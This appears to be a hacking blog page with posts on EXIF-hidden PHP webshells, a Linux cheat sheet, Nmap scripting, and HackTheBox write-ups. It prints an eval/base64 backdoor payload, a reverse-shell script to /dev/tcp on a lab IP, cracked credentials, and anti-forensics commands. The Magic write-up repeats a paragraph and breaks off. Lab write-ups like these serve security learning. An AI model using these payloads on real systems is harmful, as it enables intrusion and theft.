Here, you’ll find all the latest hacking news from around the world.

Thursday, January 28, 2021

WEBSHELL BACKDOOR CODE IN IMAGE FILES

STEGANOGRAPHY APPLIED FOR WEB EXPLOITATION


Before starting, let's introduce or refresh a couple of concepts that will come useful in order to fully understand later. 

Metadata 

As Wikipedia reports, metadata is "data that provides information about other data". In other words, it is "data about data" .

As an example, they are usually seen when we right-click on an image, under the 'Details' tab.





This metadata are called EXIF data, which stands for Exchangeable Image File Format. Most digital photo software can display EXIF information, but you usually can't edit it.

The Exif file format is the same as JPEG file format. Exif inserts some of the image/digital camera information data and thumbnail image to JPEG in conformity with JPEG specifications. Indeed, Exif format image files can be seen on Jpeg compliant Internet Browser, Picture viewer/Photo retouch software etc. as a usual JPEG image files.

As the title suggests, the Exit structure fields can be leveraged by an attacker for hiding malicious scripts. 


Consider a simple image like this one :





At first sight there's nothing suspicious, right?

Now, using a tool called exiftool(-k) a light tool downloadable from here, we can take a look at what it's hiding behind, in its metadata. 



Within the Exif data the are two suspicious entries, "copyright" and "document name", that contain respectively : 
/.*/e 
and 
eval(base64_decode(JF9QT1NUWydwYXNzd29yZCddKTs='));

"/.*/e" is known as PCTE regex modifier and it will be evaluate the data from $exif['Document Name']

How an attacker can use these scripts? 

Consider this PHP script :



The first line downloads the remote jpg image file with the stashes code in it and then sets the $exif variable with the array values. The variable will have this structure : 



The final setup in this process is to execute the PHP preg_replace function.

Notice that the $exif['Copyright'] variable data uses the "/.*/e" PCRE regex modifier (PREG_REPLACE_EVAL) which will evaluate the data from the $exif['DocumentName'] variable.


Knowing how it works and appears, how we can hunt it? 

There're many ways, tools and techniques that can be used. 
An example is this script, found on Pastebin that looks for the entries with UserComment, checking for the "/e" PCRE regex modifier. 




It the script finds that within the entry, it will output the name of the file to the console to alert us that the file is potentially dangerous.

 
Can also be used a tool called PHP Malware Finder available on GitHub.





PHP-malware-finder is a script used to detect obfuscated code, as well as files using PHP functions often used in web shells. Detection is performed by crawling the filesystem and testing files againsts a set of YARA rules. 

How not to mention Loki or Thor IOC scanner created by the awesome Nextron Systems, 
Their indicators can be derived from published incident reports, forensic analyses or malware sample collections.




 
Conclusions :

This is not a new technique but it's important to highlight that because today, for performance reasons, many organizations opt to only scan PHP files and exclude other file types from being scanned, overlooking certain types of file that shouldn't be classified as less important. 

Moreover, even though e ( PREG_REPLACE_EVAL ) was deprecated in PHP 5.5.0 and eventually removed as of PHP 7.0.0, this doesn't mean that the attack is still not prevalent. If the corporate environment is running PHP applications and it's not at the latest version of PHP, then, it's susceptible. 



References : 

https://www.media.mit.edu/pia/Research/deepview/exif.html
https://blog.sucuri.net/2013/07/malware-hidden-inside-jpg-exif-headers.html
https://www.php.net/manual/en/reference.pcre.pattern.modifiers.php

                                                                                                                                                    -G4d4r3L
Share:

Tuesday, January 5, 2021

linux cheat sheet



Everyone knows: cheat sheets are cool! They are very useful if you already know the basics about a topic but you have to look up details when you are not sure about something.

Especially, if you are new to a certain topic and you have to learn a lot of new stuff, it’s sometimes very hard to memorize everything.

Linux Network Commands
Command                                    Descriptions                                                                                  
                                                                      
watch ss -tp                               Network Connections             
netstat -ant                               Tcp Connections -anu=udp
netstat -tulpn                             Connection with PIDs
lsof -i                                    Established connections
smb://<ip>/share                           Access windows smb share
share user x.x.x.x c$                      Mount Windows share
smbclient -U user \\\\<ip>\\<share>        SMB connect
ifconfig eth# <ip>/<cidr>                  Set IP and netmask
route add default gw <gw_ip>               Set GW
ifconfig eth# mtu [size]                   Change MTU size
export MAC=xx:xx:xx:xx:xx:xx               change MAC
ifconfig <int> hw ether <MAC>              change Mac
macchanger -m <MAC> <int>                  kali Mac changer
iwlist <int> scan                          Built-in wifi scanner
dig -x <ip>                                Domain lookup for ip
host <ip>                                  Domain lookup for ip                                                                
host -t SRV _<server>_tcp.url.com          Domain SRV lookup                                                                                                   
dig @<ip> domain -t AXFR                   DNS Zone Xfer                                                                              
host -l <domain> <namesvr>                 DNS Zone Xfer                                                                                               
ip xfrm state list                         Print existing VPN keys                                                                                                                
ip addr add <ip>/<cidr> dev eth0           Adds 'hidden' interface                                                                                                
/var/log/messages | grep DHCP              List DHCP assignments                                                                        
tcpkill host <ip> and port <port>          Block ip:port                                          
echo "l" > /proc/sys/net/ipv4/ip_forward   Turn on IP Forwarding                                                                                                         
echo "nameserver x.x.x.x" > /etc/resolv.conf  Add DNS server                                                                         


Linux SYSTEM INFO
Command                                    Descriptions                                                                                  
                                                                      
nbtstat -A <ip>                            Get hostname for <ip>    
id                                         Current username
w                                          Logged on users
who -a                                     User information
last -a                                    Last users logged on
ps -ef                                     Process listing (top)
df -h                                      Disk usage (free)
uname -a                                   Kernel version/CPU info
mount                                      Mounted file systems
getent passwd                              show list of users
PATH=$PATH:/home/mypath                    Add to path variable
kill <pid>                                 Kills process with <pid>
cat /etc/issue                             Show OS info
cat /etc/*release*                         Show OS version info
cat /proc/version                          Show kernel info
rpm --query -all                           Installed pkgs (Redhat)                                                              
rpm -ivh * .rpm                            Install RPM (-e=remove)                                                                                              
dpkg -get-selections                       Installed pkgs (ubuntu)                                                                     
dpkg -I *.deb                              Install DEB (-r=remove)                                                        
pkginfo                                    Installed pkgs (Solaris)                                                                                                                
which <tscsh/csh/ksh/bash>                 Show location of executabe                                                                                                
chmod 750 <tcsh/csh/ksh>                   Disable <shell>, force bash                                                                        


Linux UTILITY COMMANDS

Command                                    Descriptions                                                                                  
                                                                      
wget http://<url> -O url.txt -o /dev/null  Grab url    
rdesktop <ip>                              Remote Desktop to <ip>
scp /tmp/file user@x.x.x.x:/tmp/file       Put file
scp user@<remoteip>:/tmp/file /tmp/file    User information
useradd -m <user>                          Add user
passwd <user>                              Change user password
rmuser uname                               Remove user
script -a <outfile>                        Record shell : Ctrl-D stops
apropos <subject>                          Find related command 
history                                    View users command history
!<num>                                     Executes line # in history

Linux FILE COMMANDS


Command                                    Descriptions                                                                                    
                                                                       
diff file1 file2                           Compare file                                                                                                
rm -rf <dir>                               Force delete of <dir>                                                                                  
shred -f -u <file>                         Overwrite/delete file
touch -r <ref_file> <file>                 Matches ref_file timestamp                                                                                                      
touch -t YYYYMMDDHHSS <file>               Set file timestamp             
sudo fdisk -l                              List connected drives
mount /dev/sda# /mnt/usbkey                Mount USB Key
md5sum -t file                             Compute md5 hash           
echo -n "str" | md5sum                     Generate md5 hash
shalsum file                               SHA1 hash of file                                          
sort -u                                    Sort/show unique lines                                                                           
grep -c "str" file                         Count lines w/ "str"  
tar cf file.tar files                      Creat .tar from files
tar xf file.tar                            Extract .tar                               
tar czf file.tar.gz files                  Creat .tar.gz
tar xzf file.tar.gz                        Extract .tar.gz                                                          
tar cjf file.tar.bz2 files                 Creat .tar.bz2                                                                                                    
tar xjf file.tar.bz2                       Extract .tar.bz2                                                                              
gzip file                                  Cmpress/rename file                                                                            
gzip -d file.gz                            Decompress file.gz                                                                         
upx -9 -o out.exe orig.exe                 UPX packs orig.exe                                                                                                 
zip -r <zipname.zip> \Directory\*          Creat zip                                                                          
dd skip=1000 count=2000 bs=8 if=file of=file    Cut block 1K-3K from file               
split -b 9K \<file> <prefix>               split file into 9k chunks                                                                 
awk 'sub("$"."\r")' unix.txt > win.txt     Win compatible txt file                                                      
find -i -name <file> -type *.pdf           Find PDF files                                                                     
find / -perm -4000 -o -perm -2000 -exec ls - ldb{} \;  search for setuid files
dos2unix <file>                            Convert to *nix format
file <file>                                Determine file type/info
chattr (+/-) i <file>                      Set/Unset immutable bit
Share:

Thursday, December 31, 2020

Nmap' scripts categories - full potential unleashed



I know that almost all of you may already know that Nmap provides the use of scripts for doing analysis of the target. Many of us just add the option "-sC" and go, right? no.
These runs only the default scripts, a subcategory of them, that are roughly 120

Every one of us uses Nmap but not everyone knows the full potential of the Nmap' scripts.
In this article, we will take a deeper look at the scripts and the full potential of nmap.

First of all, where are the scripts stored, and what type of scripts we have at disposal.


This command will show you the different category:

grep -r categories /usr/share/nmap/scripts/*.nse | cut -d ":" -f 2 | grep -oP '"(.*?)"' | sort -u



If you're against a smb service like often happens, and you run the -sC option, you'll never see if it is vulnerable to MS17-010 or better known as eternal blue. Its script falls under the category of "vuln" and "safe", not the "default".


Nmap allows the use of scripts simply adding the "--script" option. 
This option can take : 

1. script name
2. NSE category
3. Path to an NSE file
4. Folder containing scripts
5. An expression

Expressions allow incredible flexibility when selecting scripts, as we will see in the following sections.


> Selecting by script name or category



To select a whole category, simply use the name of the category as the argument. 
For example to run the exploit category use the following command:

nmap --script exploit <target>


You can also run several categories by separating them with a comma:

nmap --script discovery,intrusive <target>


> Selecting by filename or folder



In order to execute an NSE script file, we can use this syntax:

nmap --script /path/to/script.nse <target>


Similarly, with categories you can execute several scripts by separating paths with a comma:

nmap --script /path/to/script.nse,/another/path/script2.nse <target>


To execute all the scripts contained in a folder, we only need to pass the folder name as an argument:

nmap --script /path/to/folder/ <target>


> Advanced script selection with expressions



Expressions are used to describe set of scripts. We'll go now through different scenarios where we can take advantage of script selection.

In this example the not exploit expression will match any script that does not belong to the exploit category:

nmap -sV --script "not exploit" <target>


The OR and AND operators allow constructing more complex and logic expressions. The following expression will match any script that is not inside the intrusive, dos or exploit categories:

nmap --script "not(intrusive or dos or exploit)" -sV <target>


If we would like to execute all scripts within the broadcast and discovery categories, we'll use:

nmap --script "broadcast and discovery" <target>


If you are selecting scripts, you can also use the wildcard character, *:

nmap --script "snmp-*" <target>


Of course, we can combine wildcards and expressions. For example, let's run all the scripts whose names contain http, but exclude some kind of scripts like http-slowloris, http-brute, http-form-fuzzer or http-enum:

nmap --script "*http* and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" <target>


We can also combine wildcarded filters with expressions when selecting categories. The next command executes all scripts whose names begin with http- that are not in the exploit category:

nmap --script "http-* and not(exploit)" <target>


> NSE script arguments



The --script-args Nmap option is used to set arguments in NSE scripts. For example, if we would like to set the http library argument "user agent", we can run:

nmap -sV --script http-title --script-args http.useragent="Mozilla 1337" <target>


Not a lot of Nmap users know this but we can also omit the script name when setting arguments:

nmap -p80 --script http-trace --script-args path <target>

We can use the preceding expression instead of using this:

nmap -p80 --script http-trace --script-args http-trace.path <target>


> Loading script arguments from a file



If you are planning to run several scans, it is probably a good idea to write down your script arguments in a file to save some typing. NSE supports loading NSE arguments from an absolute or relative path with the --script-args-file option. 

The arguments contained in the file must be separated by commas or new lines:


nmap --script "discovery,broadcast" --script-args-file nmap-args.txt <target>


nmap-args.txt
_____________________________________________________

1 |http.useragent=Not Nmap
2 |http.max-connections=50
3 |userdb=/path/to/usernames.lst
4 |passdb=/path/to/dictionary.lst
_____________________________________________________

> Forcing the execution of NSE scripts


Let's talk about how to force the execution of particular scripts.

Nmap can force the execution of a NSE script by pretending a "+" to the script name:

nmap --script +<script selection> <<arg1, arg2, …>>


If we want to force the execution of the only http-title NSE script against the service running on port 1212, thus saving a lot of time, we can run : 

nmap --script +http-title -p1212 192.168.1.210


Without the "+" sign, the script will not run but, since we added it, the report comes back with the following:

_____________________________________________________

1 |Nmap scan report for 192.168.1.210
2 |Host is up (0.00026s latency).
3 | PORT     STATE SERVICE
4 | 1212/tcp open  lupa
5 ||_http-title: W00t!
_____________________________________________________

> Debugging NSE scripts



If you need to analyze the traffic sent and received by NSE, use the --script-trace option. For example, if you would like to see the payloads sent by the NSE scripts in the exploit category, you can use this expression:

nmap --script exploit --script-trace <target>


You can also turn on the debug mode of Nmap with the -d[1-9] flag. This flag can be followed by an integer that denotes the debug level and should be between 1 and 9. The higher the level, the more verbose is the output. Here an example with a mid level :

nmap -sV –-script exploit -d4 <target> 


The --packet-trace option includes all the packets sent and received, not only the traffic generated by NSE. Useful when it comes to analyzing what we're actually doing :

nmap -O --script myscript.nse --packet-trace <target>


See you next time with an article on an awesome smb exploit using all nmap' potential!




-G4d4r3L-

Share:

Wednesday, December 30, 2020

Hackthebox Writeup




User

As always, I started with an nmap scan which revealed two ports open, port 22 (SSH) and port 80 (HTTP).


Visiting port 80 showed a very simple page and nothing else. No links, nothing. Well, except for a warning that I’d be banned if I hit a lot of 404 pages, so no gobuster or similar brute forcing was going to work here.


Fortunately, checking robots.txt gave me something to work on, as it didn’t want me to visit /writeup. Which is exactly what I did!
There wasn’t much of interest in /writeup, but wappalyzer (a Firefox plugin) identified the software running as ‘CMS Made Simple’. Something which exploit-db has several exploits for.
I found an SQL injection exploit which didn’t need any valid credentials, and since I wasn’t able to identify the version of CMS Made Simple running, I decided to give it a try.
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
Within a short time the exploit had extracted a username, and the salt and hash for the password. Using hashcat with mode 20 (md5($salt.$pass)) I got the password ‘raykayjay9’ which allowed me to log in via SSH and grab the user flag.

root

For root, I did the usual and fetched LinEnum and pspy and ran them. I didn’t initially notice anything with these tools, so I ran pspy with the parameters -fp to see all file system events.
When someone ssh’d into the box, sshd would call run-parts without a specific path, looking in the following dirs in the PATH variable:

PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Checking if any of these directories were writable showed that both /usr/local/sbin and /usr/local/bin were. So what would happen if I were to put an executable script called ‘run-parts’ into either of the above dirs?
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.10/9001 0>&1
Running chmod +x to make the above script executable and starting a reverse netcat listener

nc -lvnp 9001
All I had to do was log in via SSH again, and I had a reverse root shell and could grab the root flag!

Share:

Tuesday, December 29, 2020

Magic Hackthebox

 



Welcome Readers, Today we will be doing the hack the box (HTB) challenge

Enumeration

Starting off with a little nmap, we see SSH and HTTP open.

root@kali:~/Documents/HackTheBox/Magic# nmap -Pn -sS -n -p1-10000 -T4 -sV 10.10.10.185 -vv
...
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
...
A quick check for OpenSSH v7.6p1 vulnerabilities doesn’t seem to give us anything, so let’s move on to port 80.
At first glance, there are just a bunch of images on the site - nothing too interesting. Of note in the source code, however, are references to images located in images/uploads. This will be useful later.



Next, in the bottom left corner there is a login button which will presumably let us upload images, so let’s try that.

Next, in the bottom left corner there is a login button which will presumably let us upload images, so let’s try that.

Foothold

Now, we are presented with a very simple login dialog box. The login process appears to be pretty standard in that it POSTs a username and password to the PHP backend.



Since we don’t know the username or password, let’s try SQL injection in both fields. The idea here is that the PHP code in the back may look something like this:

Since we don’t know the username or password, let’s try SQL injection in both fields. The idea here is that the PHP code in the back may look something like this:
...


Share:

Fuzzy HackTheBox WEB (Test)


Welcome Readers, Today we will be doing the hack the box (HTB) challenge

Finding the Page

We have this nice website in front of us..


Let’s start off with our basic gobuster..

Command

gobuster -u http://docker.hackthebox.eu:42566/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm

Command Explanation

    -w (wordlist)
    -t (50 threads)
    -x (Look for these extensions in the bruteforce)

    OUTPUT

    [rikozi@rikozi tmp]$ gobuster -u http://docker.hackthebox.eu:42566/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm
    
    =====================================================
    Gobuster v2.0.1              
    =====================================================
    [+] Mode         : dir
    [+] Url/Domain   : http://docker.hackthebox.eu:42566/
    [+] Threads      : 50
    [+] Wordlist     : /usr/share/dirbuster/directory-list-2.3-medium.txt
    [+] Status codes : 200,204,301,302,307,403
    [+] Extensions   : htm,php,txt,html
    [+] Timeout      : 10s
    =====================================================
    2020/12/11 00:48:35 Starting gobuster
    =====================================================
    /index.html (Status: 200)
    /css (Status: 301)
    /js (Status: 301)
    /api (Status: 301)

    Now we got an interesting directory named api let’s gobuster this now…

    Command

    gobuster -u http://docker.hackthebox.eu:42566/api/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm

    OUTPUT

    [rikozi@rikozi tmp]$ gobuster -u http://docker.hackthebox.eu:42566/api/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt -t 50 -x php,txt,html,htm
    
    =====================================================
    Gobuster v2.0.1              
    =====================================================
    [+] Mode         : dir
    [+] Url/Domain   : http://docker.hackthebox.eu:42566/api/
    [+] Threads      : 50
    [+] Wordlist     : /usr/share/dirbuster/directory-list-2.3-medium.txt
    [+] Status codes : 200,204,301,302,307,403
    [+] Extensions   : php,txt,html,htm
    [+] Timeout      : 10s
    =====================================================
    2020/12/11 00:50:53 Starting gobuster
    =====================================================
    /index.html (Status: 200)
    /action.php (Status: 200)

    We found the action.php Let’s see what we have on this one …



    Error: Parameter not set

    So now we need to find the GET parameter which will be used at this endpoint

    Finding the parameter

    For this we will use wfuzz which can be found here

    Command

    wfuzz --hh=24 -c  -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?FUZZ=test
    

    Command Explanation

      • –hh (filter the length of characters in source code)
      • -c (Output with colors)
      • -w (Wordlist)
      • FUZZ (FUZZ keyword will be replaced by the word from the wordlist)
      [rikozi@rikozi tmp]$ wfuzz --hh=24 -c  -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?FUZZ=test 
      ********************************************************
      * Wfuzz 2.4 - The Web Fuzzer                           *
      ********************************************************
      
      Target: http://docker.hackthebox.eu:42566/api/action.php?FUZZ=test
      Total requests: 20469
      
      ===================================================================
      ID           Response   Lines    Word     Chars       Payload                                                               
      ===================================================================
      
      000015356:   200        0 L      5 W      27 Ch       "reset"                                                               
      
      Total time: 399.9509
      Processed Requests: 20469
      Filtered Requests: 20468
      Requests/sec.: 51.17877

      Now we have found our parameter which is reset let’s see what this parameter gives us …

      Error: Account ID not found

      Now we will have to bruteforce the Account ID

      Finding Account ID

      We will again use wfuzz for it but this time we will set the character length to 27 (You can find this by simply counting it)…

      Command

      wfuzz --hh=27 -c  -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?reset=FUZZ
      
      OUTPUT

      [rikozi@rikozi tmp]$ wfuzz --hh=27 -c  -w /usr/share/dirb/wordlists/big.txt http://docker.hackthebox.eu:42566/api/action.php?reset=FUZZ
      ********************************************************
      * Wfuzz 2.4 - The Web Fuzzer                           *
      ********************************************************
      
      Target: http://docker.hackthebox.eu:42566/api/action.php?reset=FUZZ
      Total requests: 20469
      
      ===================================================================
      ID           Response   Lines    Word     Chars       Payload                                                               
      ===================================================================
      
      000000318:   200        0 L      10 W     74 Ch       "20"

      So we got the account ID let’s finalise the url and see what’s the output…

      URL:-http://docker.hackthebox.eu:42566/api/action.php?reset=20
      
      And we got the flag

      Thank you guys if you like this writeup stay tuned for more !!

      this just test, original writing source





      Share:

      Contact us

      Name

      Email *

      Message *

      Theme Support